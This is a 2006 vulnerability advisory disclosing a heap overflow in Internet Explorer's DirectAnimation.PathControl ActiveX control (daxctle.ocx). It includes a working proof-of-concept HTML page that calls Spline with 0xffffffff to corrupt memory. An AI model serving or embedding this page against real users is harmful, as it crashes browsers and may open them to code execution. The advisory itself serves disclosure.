Advisory ID: XSec-06-10 Advisory Name: Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability Release Date: 08/28/2006 Tested on: Windows 2000/XP/2003 Internet Explorer 6.0 SP1 Affected version: Windows 2000 Windows XP Windows 2003 Author: nop <nop#xsec.org> http://www.xsec.org Overview: When Internet Explorer handle DirectAnimation.PathControl COM object(daxctle.ocx) \ Spline method, Set the first parameter to 0xffffffff will triggers an invalid memory \ write, That an attacker may DoS and possibly could execute arbitrary code. Exploit: =============== daxctle.htm start ================ <!-- // Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability // tested on Windows 2000 SP4/XP SP2/2003 SP1 // http://www.xsec.org // nop (nop#xsec.org) // CLSID: {D7A7D7C3-D47F-11D0-89D3-00A0C90833E6} // Info: Microsoft DirectAnimation Path // ProgID: DirectAnimation.PathControl // InprocServer32: C:\WINNT\system32\daxctle.ocx --!> <html> <head> <title>test</title> </head> <body> <script> var target = new ActiveXObject("DirectAnimation.PathControl"); target.Spline(0xffffffff, 1); </script> </body> </html> =============== daxctle.htm end ================== Link: http://www.xsec.org/index.php?module=releases&act=view&type=1&id=19 About XSec: We are redhat.
